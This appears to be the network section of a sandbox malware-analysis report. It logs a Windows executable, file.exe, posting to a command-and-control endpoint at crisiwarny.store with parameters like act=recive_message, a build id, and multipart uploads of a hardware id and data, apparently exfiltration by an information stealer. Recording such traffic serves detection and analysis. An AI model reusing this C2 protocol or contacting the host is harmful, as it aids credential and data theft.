Oct 27, 2024 12:13:16.838968039 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Oct 27, 2024 12:13:16.839003086 CET	1236	IN	Data Raw: e8 a6 db 16 c0 03 dd db 48 f2 da 53 39 28 38 06 e5 3f 42 f6 a5 dd 2e b6 74 b8 10 d5 0e 3d a1 eb a0 2a 87 7a 0a 1b 62 36 f1 73 18 0c 1a e1 cc d6 55 b9 fc 05 92 ac cf d1 47 db d9 cf 57 b1 93 e8 59 a4 ec 15 c0 af e8 2d a4 c8 fb cb 35 c2 d9 66 82 8b Data Ascii: HS9(8?B.t=zb6sUGWY-5fP[I@K\5sMO>KKvkO0xZ\|?SEg9=EcSTCZl-'t:I+i<58R?yg
Oct 27, 2024 12:13:16.839037895 CET	1236	IN	Data Raw: d4 a7 f2 2b fc a7 f6 f7 e4 92 7b 0c 3f ca f0 84 86 d2 ec 0f b8 dd 0e f5 75 2f 17 1c 5c ea e6 16 86 d2 26 f6 e7 0a 2b 19 ed 9d 68 94 5c a7 32 16 86 06 f3 43 b8 ee 42 0a aa 43 4d 50 84 ca 4e ed b5 cb 86 70 3f 26 e0 9d 5c 2a ff 16 c6 bb 66 64 ce 62 Data Ascii: +{?u/\&+h\2CBCMPNp?&\fdbo8vVV~'NQVVK^\| N6}(</$~?&n_mVfJSDgM5Yv!&Du&YqQI?V\}c%2J
Oct 27, 2024 12:13:16.839075089 CET	1236	IN	Data Raw: 9d c4 eb 1c b2 e2 f2 e8 98 0f a3 16 51 8e e2 8a 4b 9d f4 43 8c b7 16 bd 40 00 22 35 ab 82 48 ba a2 cf 20 47 4a 23 15 db d6 01 c8 e9 65 bc 27 ad 96 aa 46 26 3c 0d 64 38 56 9a 50 38 a7 fd 42 71 ce b7 3e 05 58 01 37 1f 4d 74 87 17 c4 57 0c 68 09 90 Data Ascii: QKC@"5H GJ#e'F&<d8VP8Bq>X7MtWhv4yS&hI*`oGO^v&=ZA`^l1F ]x'<\o?.s\X</rH!:2Ae;Lr1pW
Oct 27, 2024 12:13:16.844489098 CET	1120	IN	Data Raw: 44 ef bb c0 6e be d1 ef 69 42 d8 da 22 9e 14 f7 39 b7 e0 56 3a be 32 e4 36 d4 be 3c 3d af bd 07 3a ae 38 22 87 bb 84 a9 b9 83 ce 4d 9b 6d f0 84 85 68 4b 1b 9d 0c fb d3 85 9c e4 2a a4 fb 3e 22 34 09 3d 19 aa fd 33 c5 06 c7 dd a6 f6 11 42 59 a6 82 Data Ascii: DniB"9V:26<=:8"MmhK*>"4=3BY84e73BOHbuNear8t@'>`Lj@%x@0L,XN(j!rb3:<CH>$Z8>{_

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	104.21.95.91	443	1400	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-27 11:13:03 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: crisiwarny.store
2024-10-27 11:13:03 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-10-27 11:13:04 UTC	1017	IN	HTTP/1.1 200 OK Date: Sun, 27 Oct 2024 11:13:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=kfdf50thtgvh3ctevcmcbsp7m6; expires=Thu, 20 Feb 2025 04:59:43 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2EG0h%2BL%2FRzN2fbCdYIVkaMgmKRC04aejo6nah3Ph8%2BLVhQhxWyGw%2F49%2Fk%2Fx%2FQPT2aEFT%2FyR3BVVQrG3bxAqRnF7t4Q2ElyaMuPkZmqMRfNu1EkvdpGIcpFDN6HLequYev64T"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d92412ee82747a5-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1096&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2838&recv_bytes=907&delivery_rate=2511708&cwnd=251&unsent_bytes=0&cid=fa0d01f71ae05d41&ts=903&x=0"
2024-10-27 11:13:04 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-10-27 11:13:04 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49705	104.21.95.91	443	1400	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-27 11:13:04 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 52 Host: crisiwarny.store
2024-10-27 11:13:04 UTC	52	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e 64 61 72 79 79 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=4SD0y4--legendaryy&j=
2024-10-27 11:13:05 UTC	1009	IN	HTTP/1.1 200 OK Date: Sun, 27 Oct 2024 11:13:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ncqiu3t9f7c3oh9e9mp950dgii; expires=Thu, 20 Feb 2025 04:59:44 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YuVdQCC%2BttzaJ0rOHnBS1Pti9BTMYULgR2QIDZJEQ1qd5aU%2BbCeLcoV5vwmpl5mpYqBl%2BYzqf4XlvrgUKHuv5RdfoHshimYj2oI9wNNM%2FMA4kYDMXJly9hsxFmEk7Zy5V1hl"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d9241365b17e5c6-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1096&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2839&recv_bytes=952&delivery_rate=2576512&cwnd=247&unsent_bytes=0&cid=9eb374d9a02a8c49&ts=520&x=0"
2024-10-27 11:13:05 UTC	360	IN	Data Raw: 34 64 66 0d 0a 75 50 41 59 6d 75 77 49 32 6d 32 52 48 30 79 4e 48 68 68 30 69 72 75 70 4a 6f 75 43 76 4b 2f 43 4e 4f 5a 33 56 4d 31 4b 50 32 4c 44 30 6d 36 34 31 6a 7a 32 54 2b 4a 36 62 72 64 71 61 67 48 76 6c 34 74 48 37 36 43 47 79 61 4e 59 6c 52 4a 34 37 7a 78 53 51 49 4b 57 65 66 61 66 62 66 5a 50 39 47 64 75 74 30 56 6a 56 75 2f 56 69 78 79 70 35 39 62 4e 6f 31 69 45 46 6a 2b 69 4f 6c 4d 42 30 4a 78 2f 38 6f 6c 72 76 67 7a 39 63 69 6e 6f 65 33 6b 65 35 4e 4c 45 54 75 61 67 6b 49 32 6e 54 73 52 4e 64 6f 41 76 53 77 50 31 6b 57 76 78 7a 6e 58 32 46 72 4e 36 49 71 38 6b 4f 68 58 76 32 63 56 41 37 2b 6e 55 78 36 70 51 68 52 4d 2b 76 53 4e 5a 43 74 43 53 66 50 4f 44 59 71 6f 42 39 33 55 69 37 6e 46 35 56 71 61 5a 7a 46 79 70 75 4a 36 65 6b 6c 57 56 42 43 Data Ascii: 4dfuPAYmuwI2m2RH0yNHhh0irupJouCvK/CNOZ3VM1KP2LD0m641jz2T+J6brdqagHvl4tH76CGyaNYlRJ47zxSQIKWefafbfZP9Gdut0VjVu/Vixyp59bNo1iEFj+iOlMB0Jx/8olrvgz9cinoe3ke5NLETuagkI2nTsRNdoAvSwP1kWvxznX2FrN6Iq8kOhXv2cVA7+nUx6pQhRM+vSNZCtCSfPODYqoB93Ui7nF5VqaZzFypuJ6eklWVBC
2024-10-27 11:13:05 UTC	894	IN	Data Raw: 6c 36 6d 35 78 48 2b 58 55 79 30 6e 6a 37 39 33 4e 70 31 79 4f 47 6a 79 72 4a 56 41 47 32 70 49 36 74 73 35 74 6f 45 2b 72 50 51 33 71 62 48 30 61 2f 70 76 78 42 50 61 75 78 34 32 6e 57 73 52 4e 64 71 63 74 58 67 50 52 6e 58 6e 77 68 58 69 34 48 66 56 77 4b 2f 31 36 66 78 6a 69 32 74 6c 4f 35 2b 62 64 78 4b 74 66 67 52 49 79 37 32 59 64 42 38 4c 53 49 72 69 76 5a 37 4d 44 2b 57 6f 75 72 32 4d 30 44 36 6a 65 78 77 53 78 6f 4e 72 4d 70 46 65 41 47 7a 69 72 4a 46 73 4f 31 35 31 38 38 6f 35 74 73 67 66 37 66 43 50 6b 63 33 6f 54 35 64 33 4e 53 4f 6a 6c 6e 6f 50 67 55 5a 78 56 62 75 38 47 57 67 50 49 30 45 2f 37 67 47 53 2f 47 62 4e 69 59 50 59 38 66 52 71 6f 67 59 74 4b 37 4f 2f 4d 7a 4c 4a 54 69 67 63 36 71 69 35 51 41 39 53 53 66 2f 2b 44 5a 4c 34 49 38 48 Data Ascii: l6m5xH+XUy0nj793Np1yOGjyrJVAG2pI6ts5toE+rPQ3qbH0a/pvxBPaux42nWsRNdqctXgPRnXnwhXi4HfVwK/16fxji2tlO5+bdxKtfgRIy72YdB8LSIrivZ7MD+Wour2M0D6jexwSxoNrMpFeAGzirJFsO15188o5tsgf7fCPkc3oT5d3NSOjlnoPgUZxVbu8GWgPI0E/7gGS/GbNiYPY8fRqogYtK7O/MzLJTigc6qi5QA9SSf/+DZL4I8H
2024-10-27 11:13:05 UTC	1369	IN	Data Raw: 33 66 38 64 0d 0a 47 2b 6e 51 38 35 58 42 30 42 4f 58 54 7a 6b 72 6c 35 64 48 4e 6f 56 65 4b 48 7a 33 76 5a 68 30 48 77 74 49 69 75 4b 46 6e 71 42 33 35 64 6a 2b 74 53 58 6b 59 35 74 37 64 42 50 61 75 78 34 32 6e 57 73 52 4e 64 71 51 75 55 51 7a 61 6c 47 6a 32 67 58 69 79 48 66 64 7a 4b 75 4e 79 63 78 76 6e 33 4e 6c 41 36 66 4c 66 79 4b 64 59 69 51 63 7a 37 32 59 64 42 38 4c 53 49 72 69 30 58 72 38 66 34 6e 70 73 32 6e 39 30 47 4f 2f 50 69 31 75 6e 2b 5a 37 4b 72 42 62 63 56 54 57 6a 4a 56 51 46 31 59 42 77 39 49 39 34 76 77 62 36 64 79 2f 68 63 33 45 61 37 63 76 41 53 2b 48 76 33 38 43 74 58 59 41 56 64 75 46 6f 57 68 69 61 79 6a 72 5a 67 32 57 71 44 4f 49 2f 47 2b 78 79 64 42 48 2b 6d 64 51 4b 38 4b 44 5a 77 65 41 4f 78 42 51 36 6f 79 6c 53 42 74 43 61 Data Ascii: 3f8dG+nQ85XB0BOXTzkrl5dHNoVeKHz3vZh0HwtIiuKFnqB35dj+tSXkY5t7dBPaux42nWsRNdqQuUQzalGj2gXiyHfdzKuNycxvn3NlA6fLfyKdYiQcz72YdB8LSIri0Xr8f4nps2n90GO/Pi1un+Z7KrBbcVTWjJVQF1YBw9I94vwb6dy/hc3Ea7cvAS+Hv38CtXYAVduFoWhiayjrZg2WqDOI/G+xydBH+mdQK8KDZweAOxBQ6oylSBtCa
2024-10-27 11:13:05 UTC	1369	IN	Data Raw: 36 38 44 2f 35 32 49 4f 46 31 64 68 37 6b 33 74 6c 4a 37 4f 6a 55 78 4b 56 61 69 52 59 6b 72 43 6b 64 54 70 71 56 59 72 6a 57 4b 70 38 38 78 46 35 75 38 44 4a 6a 56 75 2f 56 69 78 79 70 34 64 62 4b 72 6c 4b 57 47 79 53 68 4c 31 30 47 30 70 70 39 39 49 42 6b 71 67 66 79 66 53 44 67 64 48 4d 53 36 64 33 50 53 4f 36 67 6b 49 32 6e 54 73 52 4e 64 6f 63 72 52 78 71 59 76 48 48 34 69 58 71 75 46 4c 4e 69 59 50 59 38 66 52 71 6f 67 59 74 41 34 75 72 58 7a 71 6c 53 69 52 55 2f 6f 43 46 56 44 64 4b 41 65 2f 4b 63 62 72 30 4f 2f 48 63 71 35 33 42 31 47 75 7a 4c 77 41 53 6e 6f 4e 6e 56 34 41 37 45 4e 54 32 35 43 30 38 53 6d 6f 30 30 34 63 35 74 74 45 2b 72 50 53 66 6a 66 58 73 63 37 74 4c 4f 53 65 6e 6c 31 4d 71 73 56 6f 51 57 4d 4b 6b 6c 56 51 6a 57 6e 6e 6e 31 69 Data Ascii: 68D/52IOF1dh7k3tlJ7OjUxKVaiRYkrCkdTpqVYrjWKp88xF5u8DJjVu/Vixyp4dbKrlKWGyShL10G0pp99IBkqgfyfSDgdHMS6d3PSO6gkI2nTsRNdocrRxqYvHH4iXquFLNiYPY8fRqogYtA4urXzqlSiRU/oCFVDdKAe/Kcbr0O/Hcq53B1GuzLwASnoNnV4A7ENT25C08Smo004c5ttE+rPSfjfXsc7tLOSenl1MqsVoQWMKklVQjWnnn1i
2024-10-27 11:13:05 UTC	1369	IN	Data Raw: 31 63 79 2f 70 63 48 64 57 70 70 6e 4d 58 4b 6d 34 6e 75 71 36 57 34 49 43 4a 35 6f 76 58 56 47 61 6a 54 54 68 7a 6d 32 30 54 36 73 39 49 2b 4e 32 64 78 50 73 30 63 78 48 36 4f 7a 61 77 4b 31 53 6a 52 45 7a 76 54 70 62 44 74 71 64 64 50 65 43 65 4c 59 4b 38 33 46 75 6f 54 78 39 44 71 69 42 69 33 58 2b 34 4a 37 53 37 6b 2f 45 45 6a 72 76 63 42 30 50 31 34 42 32 39 34 35 72 75 77 76 34 65 69 6a 70 66 58 6b 54 36 39 7a 4e 52 65 6e 73 31 4d 71 6f 58 49 6f 59 4d 4b 73 75 57 30 43 55 30 6e 33 67 7a 6a 4c 34 50 66 35 7a 4a 2b 78 36 64 77 44 41 36 49 74 62 70 2f 6d 65 79 71 77 57 33 46 55 79 70 43 42 52 42 64 4b 58 65 2f 43 45 59 72 63 41 34 58 77 68 35 6e 74 78 47 2b 66 58 7a 6b 72 37 35 39 58 47 71 46 2b 4b 45 33 62 68 61 46 6f 59 6d 73 6f 36 7a 6f 31 6b 73 78 Data Ascii: 1cy/pcHdWppnMXKm4nuq6W4ICJ5ovXVGajTThzm20T6s9I+N2dxPs0cxH6OzawK1SjREzvTpbDtqddPeCeLYK83FuoTx9DqiBi3X+4J7S7k/EEjrvcB0P14B2945ruwv4eijpfXkT69zNRens1MqoXIoYMKsuW0CU0n3gzjL4Pf5zJ+x6dwDA6Itbp/meyqwW3FUypCBRBdKXe/CEYrcA4Xwh5ntxG+fXzkr759XGqF+KE3bhaFoYmso6zo1ksx
2024-10-27 11:13:05 UTC	1369	IN	Data Raw: 2f 58 31 31 56 71 61 5a 7a 46 79 70 75 4a 37 38 74 6c 47 44 47 6e 53 47 4c 30 59 42 30 4a 46 78 39 4d 35 31 39 68 61 7a 65 69 4b 76 4a 44 6f 62 35 4e 54 50 56 75 58 67 33 73 53 6e 58 4a 59 61 4f 61 49 72 58 51 58 49 6b 32 6a 33 68 57 2b 37 43 2f 78 79 49 75 64 32 4f 6c 69 6f 33 74 4d 45 73 61 44 79 7a 72 46 63 78 6a 49 73 75 53 39 52 45 64 47 66 64 72 69 52 4a 4b 46 50 39 48 46 75 74 7a 78 36 46 2b 58 4c 7a 6b 58 6a 36 74 50 46 72 31 4f 42 47 6a 4b 72 49 31 4d 53 31 4a 31 36 2f 6f 56 72 76 51 7a 34 64 79 44 6d 62 6a 70 59 71 4e 37 54 42 4c 47 67 39 4e 61 68 57 34 68 58 47 4b 51 2b 57 6b 4c 37 6e 48 48 2f 67 6e 7a 34 45 4c 31 6b 62 75 68 77 4f 6b 36 6f 30 4d 56 49 36 75 66 57 78 61 56 57 6a 78 55 35 70 53 5a 61 45 74 43 65 63 4f 71 42 61 62 55 4c 2f 6e 63 Data Ascii: /X11VqaZzFypuJ78tlGDGnSGL0YB0JFx9M519hazeiKvJDob5NTPVuXg3sSnXJYaOaIrXQXIk2j3hW+7C/xyIud2Olio3tMEsaDyzrFcxjIsuS9REdGfdriRJKFP9HFutzx6F+XLzkXj6tPFr1OBGjKrI1MS1J16/oVrvQz4dyDmbjpYqN7TBLGg9NahW4hXGKQ+WkL7nHH/gnz4EL1kbuhwOk6o0MVI6ufWxaVWjxU5pSZaEtCecOqBabUL/nc
2024-10-27 11:13:05 UTC	1369	IN	Data Raw: 52 71 6f 67 59 74 45 37 65 7a 64 79 71 35 5a 69 52 6f 78 70 43 64 58 44 73 69 64 66 2f 43 43 59 72 55 64 2b 58 63 38 35 6e 56 33 47 4f 44 4c 79 41 53 6e 6f 4e 6e 56 34 41 37 45 4a 7a 79 73 4a 45 73 4e 31 64 4a 6c 74 70 63 71 76 77 4f 7a 4a 57 37 39 62 6e 6f 64 36 4e 37 46 56 75 6a 6f 30 63 65 67 55 49 38 66 4e 61 59 73 55 77 6e 63 6b 33 66 35 6a 32 71 39 44 2f 70 76 49 36 38 79 4f 68 48 77 6d 5a 4d 45 33 75 7a 56 2f 4b 4e 41 78 41 70 34 74 6d 68 61 44 4a 72 4b 4f 76 6d 63 5a 37 41 4c 38 33 41 6f 35 48 31 37 46 65 6a 5a 79 45 54 73 36 39 48 4c 70 31 75 4f 48 44 2b 39 49 46 6b 53 32 70 35 2b 75 4d 41 71 76 78 65 7a 4a 57 37 66 66 33 45 61 36 4e 54 65 42 50 61 75 78 34 32 6e 57 73 52 4e 64 71 63 6a 56 67 62 52 6b 58 6e 32 68 57 43 33 41 50 6c 37 4b 4f 64 35 Data Ascii: RqogYtE7ezdyq5ZiRoxpCdXDsidf/CCYrUd+Xc85nV3GODLyASnoNnV4A7EJzysJEsN1dJltpcqvwOzJW79bnod6N7FVujo0cegUI8fNaYsUwnck3f5j2q9D/pvI68yOhHwmZME3uzV/KNAxAp4tmhaDJrKOvmcZ7AL83Ao5H17FejZyETs69HLp1uOHD+9IFkS2p5+uMAqvxezJW7ff3Ea6NTeBPaux42nWsRNdqcjVgbRkXn2hWC3APl7KOd5
2024-10-27 11:13:05 UTC	1369	IN	Data Raw: 57 4a 52 65 54 77 32 59 33 75 46 6f 4a 56 62 76 39 6d 48 51 54 4c 30 69 4b 6f 33 44 48 74 58 4b 51 74 66 50 41 79 59 31 62 2b 6d 5a 4d 57 70 36 44 4d 6a 66 67 57 77 78 59 6b 76 53 35 65 46 74 6e 56 52 4d 61 75 59 62 51 4d 2f 33 77 70 72 7a 49 36 47 61 69 42 38 67 54 71 38 73 79 43 73 55 43 4a 42 54 48 6a 49 45 77 4e 31 74 49 30 75 4d 4a 75 73 77 50 32 65 6a 36 67 62 6d 6f 64 35 4d 2b 48 51 50 75 67 6b 49 32 78 58 59 73 48 4f 4b 68 6e 54 42 62 58 67 6e 6e 39 69 53 61 77 48 76 35 78 62 71 45 38 62 78 33 6b 33 38 5a 52 70 76 48 49 7a 72 5a 52 79 42 30 6e 6f 69 51 64 50 35 54 53 59 72 6a 57 4b 6f 30 4d 2f 58 4d 70 2b 57 30 33 4e 75 50 56 79 45 6a 6f 35 35 36 44 34 46 44 45 54 57 58 68 61 46 6b 52 6d 73 6f 71 71 74 55 2f 36 31 69 6a 4c 7a 47 68 5a 54 6f 41 71 Data Ascii: WJReTw2Y3uFoJVbv9mHQTL0iKo3DHtXKQtfPAyY1b+mZMWp6DMjfgWwxYkvS5eFtnVRMauYbQM/3wprzI6GaiB8gTq8syCsUCJBTHjIEwN1tI0uMJuswP2ej6gbmod5M+HQPugkI2xXYsHOKhnTBbXgnn9iSawHv5xbqE8bx3k38ZRpvHIzrZRyB0noiQdP5TSYrjWKo0M/XMp+W03NuPVyEjo556D4FDETWXhaFkRmsoqqtU/61ijLzGhZToAq
2024-10-27 11:13:05 UTC	1369	IN	Data Raw: 6e 6f 4d 79 4e 2b 42 62 44 47 7a 75 75 4b 31 4d 44 79 49 42 38 2b 35 68 70 2f 7a 48 4e 57 43 50 69 65 58 51 52 31 75 66 71 54 76 6e 74 30 63 71 65 61 4c 4d 45 4d 62 39 71 65 77 50 4d 6b 54 71 32 7a 6e 4c 34 56 37 4e 63 4a 50 39 78 64 52 47 6f 6c 34 74 41 71 62 69 65 36 4b 31 62 67 52 73 78 37 51 6c 58 45 4e 65 64 66 62 6a 41 4b 72 52 50 71 7a 30 76 35 57 78 33 47 65 2b 56 7a 46 37 75 6f 4a 43 4e 72 68 62 63 56 54 65 6c 4f 46 41 50 33 64 35 38 39 6f 41 71 70 30 48 71 50 54 69 76 4a 43 6c 59 71 4d 75 4c 48 4b 6d 6e 30 4d 43 68 56 59 6f 57 4a 4c 30 75 58 68 62 5a 31 55 54 47 71 32 65 31 43 76 31 36 45 4e 46 64 63 41 62 6c 31 73 77 47 79 65 66 49 7a 70 35 6f 73 77 51 78 76 32 70 37 41 38 79 52 4f 72 62 4f 63 76 68 58 73 31 77 6b 2f 33 46 31 45 61 72 35 7a 46 Data Ascii: noMyN+BbDGzuuK1MDyIB8+5hp/zHNWCPieXQR1ufqTvnt0cqeaLMEMb9qewPMkTq2znL4V7NcJP9xdRGol4tAqbie6K1bgRsx7QlXENedfbjAKrRPqz0v5Wx3Ge+VzF7uoJCNrhbcVTelOFAP3d589oAqp0HqPTivJClYqMuLHKmn0MChVYoWJL0uXhbZ1UTGq2e1Cv16ENFdcAbl1swGyefIzp5oswQxv2p7A8yROrbOcvhXs1wk/3F1Ear5zF

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49706	104.21.95.91	443	1400	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-27 11:13:06 UTC	282	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12840 Host: crisiwarny.store
2024-10-27 11:13:06 UTC	12840	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 44 37 35 44 39 31 46 34 35 35 31 41 36 31 39 38 41 38 32 45 36 44 30 42 31 39 45 34 30 32 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"7D75D91F4551A6198A82E6D0B19E4023--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
2024-10-27 11:13:06 UTC	1015	IN	HTTP/1.1 200 OK Date: Sun, 27 Oct 2024 11:13:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=r0qt53j8ke1s43k727kbn76r58; expires=Thu, 20 Feb 2025 04:59:45 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iYd%2BczG2wC3evJ9lYvVMOKJfJt3lIonMpsaaWdjkDYYAM4LmjO1eCsGbq%2Bjv6hQBVF%2F6ZE6fVKMLHeDHIozGpsVKIOpTQXq%2FvA9XIOzkQZXoYvJa8Q6WPqtxuSiw6SwoFO2%2B"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d92413f0b28e946-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1366&sent=12&recv=20&lost=0&retrans=0&sent_bytes=2838&recv_bytes=13780&delivery_rate=2210687&cwnd=251&unsent_bytes=0&cid=d8c3ac1b477ef060&ts=608&x=0"
2024-10-27 11:13:06 UTC	23	IN	Data Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 0d 0a Data Ascii: 11ok 173.254.250.90
2024-10-27 11:13:06 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49707	104.21.95.91	443	1400	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-27 11:13:07 UTC	282	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15082 Host: crisiwarny.store
2024-10-27 11:13:07 UTC	15082	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 44 37 35 44 39 31 46 34 35 35 31 41 36 31 39 38 41 38 32 45 36 44 30 42 31 39 45 34 30 32 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"7D75D91F4551A6198A82E6D0B19E4023--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
2024-10-27 11:13:08 UTC	1008	IN	HTTP/1.1 200 OK Date: Sun, 27 Oct 2024 11:13:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=3nb10tjg7i6uss7jm2bhsvlhnn; expires=Thu, 20 Feb 2025 04:59:46 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dJwjCXfO%2FsG3Xe5vERxaxbrY8S%2FRkWBOHKWeRncXpqfXZbsG3tPPWpIeNt4ZXBdWOrH4JPuJ8M6b4mEG8cneqlub0FvmYcUORTri5rkVYwmKMyFBrCfo3zqhZqXcU3n2ba9v"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d9241470dd66c30-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1132&sent=9&recv=20&lost=0&retrans=0&sent_bytes=2838&recv_bytes=16022&delivery_rate=2511708&cwnd=251&unsent_bytes=0&cid=baced30882cc956d&ts=557&x=0"
